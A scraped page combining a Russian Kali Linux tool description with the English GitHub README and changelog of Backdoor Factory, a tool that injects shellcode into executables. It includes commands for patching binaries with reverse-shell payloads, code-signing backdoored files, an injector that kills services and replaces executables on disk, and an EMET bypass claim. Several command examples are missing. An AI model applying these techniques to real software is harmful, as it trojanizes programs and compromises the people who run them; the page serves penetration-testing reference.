Меню Рубрики

Backdoor factory kali linux

Инструменты Kali Linux

Список инструментов для тестирования на проникновение и их описание

Backdoor Factory (BDF)

Описание Backdoor Factory

Backdoor Factory (BDF) патчит шеллкодом исполнимые файлы PE, ELF, Mach-O.

Цель BDF – это пропатчить исполнимые бинарники желаемым шеллкодом и сохранить их нормальное выполнение как в до пропатченном состоянии.

Поддерживаются: Windows PE x32/x64 и Linux ELF x32/x64 (System V).

Некоторые исполнимые файлы имеют встроенные защиты, т.е. программа будет срабатывать не на всех бинарниках. Рекомендуется тестировать исполнимые файлы перед распространением файлов на клиентские машины или использовании в упражнении.

PE файлы

  • Может найти codecaves в EXE/DLL.
  • По умолчанию очищает указатель на таблицу PE сертификатов, следовательно, снимает подпись с исполнимого файла.
  • Может сделать инжект шеллкода внутрь code caves или в новую секцию.
  • Может найти, должен ли исполнимый файл PE запускаться с повышенными привилегиями.
  • При выборе code caves, вы можете использовать следующие команды:
  • -Jump (j), для прыжка code cave
  • -Single (s), для патчинга всего вашего шеллкода в одну code cave
  • -Append (a), для создания code cave
  • -Ignore (i или q), игнорировать этот бинарник
  • Может игнорировать DLLs
  • Импорт таблицы парчинга
  • AutoPatching (-m automtic)
  • Onionduke (-m onionduke)

ELF файлы

  • Добавление 1000 байт (в байтах) к TEXT SEGMENT (текстовому сегменту) и инжект в эту секцию кода шеллкода.

Mach-O файлы

  • Патчинг Pre-Text Section и удаление подписи


Backdoor factory kali linux

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Supporting: Windows PE x32/x64 and Linux ELF x32/x64 (System V)

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises.

  • Author: Joshua Pitts
  • License: GPLv3

Tools included in the backdoor-factory package

backdoor-factory – Patch win32/64 binaries with shellcode

# backdoor-factory
__________ __ .___
\______ \_____ ____ | | __ __| _/____ ___________
| | _/\__ \ _/ ___\| |/ // __ |/ _ \ / _ \_ __ \
| | \ / __ \\ \___| | ) | \/
|______ /(____ /\___ >__|_ \____ |\____/ \____/|__|
\/ \/ \/ \/ \/
___________ __
\_ _____/____ _____/ |_ ___________ ___.__.
| __) \__ \ _/ ___\ __\/ _ \_ __ ) | \/\___ |
\___ / (____ /\___ >__| \____/|__| / ____|
\/ \/ \/ \/


Backdoor factory kali linux

If nothing happens, download GitHub Desktop and try again.

Launching GitHub Desktop

If nothing happens, download GitHub Desktop and try again.

Launching Xcode

If nothing happens, download Xcode and try again.

Launching Visual Studio

Latest commit

Git stats


Failed to load latest commit information.


New version of BACKDOOR FACTORY being developed, to be released July 2021, only to sponsors! Sponsor here: https://github.com/sponsors/secretsquirrel

The Backdoor Factory (BDF)

For security professionals and researchers only.

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

Black Hat USA 2015:

Contact the developer on:

Under a BSD 3 Clause License

####Dependences #####To use OnionDuke you MUST be on an intel machine because aPLib has no support for the ARM chipset yet.

Capstone engine can be installed from PyPi with:

Pefile, most recent:

osslsigncode (included in repo):


This will install Capstone with 3.01 pip to install pefile.

Some executables have built in protections, as such this will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises. I’m on the verge of bypassing NSIS, so bypassing these checks will be included in the future.

Recently tested on many binaries.

./backdoor.py -h Usage: backdoor.py [options]

###Mach-O Files Pre-Text Section patching and signature removal

###Patch an exe/dll using an existing code cave:

###Patch an exe/dll by adding a code section:

###Patch a directory of exes: ./backdoor.py -d test/ -i -p 8080 -s reverse_shell_tcp -a . output too long for README.

###User supplied shellcode: msfpayload windows/exec CMD=’calc.exe’ R > calc.bin ./backdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin This will pop calc.exe on a target windows workstation. So 1337. Much pwn. Wow.

BDF can sign PE files if you have a codesigning cert. It uses osslsigncode. Put your signing cert and private key in the certs/ directory. Prep your certs using openssl commands from this blog post: http://secureallthethings.blogspot.com/2015/12/add-pe-code-signing-to-backdoor-factory.html

Put your private key password in a file (gasp) as so (exactly as so):

Name your certs EXACTLY as follows:

Your certs/ directory should look excatly as so:

Enable PE Code Signing with the -C flag as so:

On successful run you should see this line in BDF output:

###Hunt and backdoor: Injector | Windows Only The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.
Edit the python dictionary «list_of_targets» in the ‘injector’ module for targets of your choosing.

  • Fix entry point truncation bug that led to improper recovery in rare instances
  • Support for dynamic paths in BDFProxy for preprocessor
  • Added the preprocessor and other optimizations
  • The preprocessor allows the user to modify the binary prior to payload injection
  • Invoke with the -p flag
  • See samples in ./preprocessor/
  • Added directory paths to BDF to find certs directory.
  • Bug fix in rsrc section for onionduke patching and remove of random win32 version value in PE Header
  • Added proper truncating of a PE file after signature pointer is cleared in PE header — e.g. proper unsigning. Resulting in better support for IAT patching
  • Fixed bug in IAT directory cave assignment that caused BDF crash
  • Made the feature optional with -A flag
  • Changed the Import Table Directory modifications from adding a new section to using an existing code cave

Added ‘replace’ PATCH_METHOD — a straight PE copy pasta of the supplied binary

More for usage with BDFProxy

Usage: ./backdoor.py -f weee.exe -m replace -b supplied_binary.exe

  • Stability fix for auto cave selection for rare caves of overlap
  • BH USA UPDATES, w00t!
  • OnionDuke, use -m onionduke * Supports user supplied exe’s and dll’s * Usage: ./backdoor.py -f originalfile.exe -m onionduke -b pentest.dll/exe
  • XP MODE = Prior IAT based payloads did not support XP, Wine, or Windows 98. If you need to support XP use the -X flag. I’m not supporting anything less than XP (and not XP x64).
  • Invoke UAC prompt to runas as admin. experimental — patches the PE manifest if requestedExecutionLevel exists.
  • Stability updates: * Fixed a bug with incorrect RVA calculation jmp’ing across 2+ code caves * Better checks to determine if a new section for the IAT will write into appended data and therefore fail
  • Speed Improvements: * Faster code cave finding while using automatic mode (-m automatic) * Faster rsrc parsing to find manifest file
  • Bug fix to the reverse_tcp_stager_threaded payload when using single caves payload
  • Adding check for Bound Imports (PE files with bound imports will not be patched)

Automatic patching for PE files (use -m automatic with a *_threaded payload)

New IAT payloads for x86/x64 PE files

####2/14/2015 I delay the payload for 30 seconds, main code runs right away.

Setting of firm capstone commit for building into BDF, capstone ‘Next’ repo breaks BDF.

Fixes to support cython capstone implementation null byte truncation issue

This script will output patched files in backdoored that will allow for the user to test the payloads as they wish. Each payload type increments the port used by one.

OS X Beaconing Payloads for x86 and x64: beaconing_reverse_shell_tcp

-B 15 —> set beacon time for 15 secs

Bug fix to support OS X for BDFProxy

PE UPX Patching Added

Mach-O x86/x64 added

x86 IAT payload optimization

Added support for ARM x32 LE ELF patching

Added FreeBSD x32 ELF patching support

Change to BSD 3 Clause License

During the process of adding Capstone, I removed about 500 lines of code. That’s pretty awesome.

Renamed loadliba_reverse_tcp to iat_reverse_tcp.

Small optimizations for speed.

Added a new win86 shellcode: loadliba_reverse_tcp

  • Based on the following research by Jared DeMott: http://bromiumlabs.files.wordpress.com/2014/02/bypassing-emet-4-1.pdf — Thanks @bannedit0 for mentioning this.
  • This shellcode uses LoadLibraryA and GetProcAddress APIs to find all necessary APIs for a reverse TCP connection. No more of Stephen Fewers API hash lookup (which is still brilliant).
  • It’s not stealthy. It’s position dependent. But the results are great (code cave jumping): https://www.virustotal.com/en/file/a31ed901abcacd61a09a84157887fc4a189d3fe3e3573c24e776bac8d5bb8a0f/analysis/1401385796/
  • Bypasses EMET 4.1. The caller protection doesn’t catch it.
  • As such, I’ll be furthering this idea with an algo that patches the binary with custom shellcode based on the APIs that are in the IAT. Including porting the current win86 shellcodes to this idea.


Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors


Популярные записи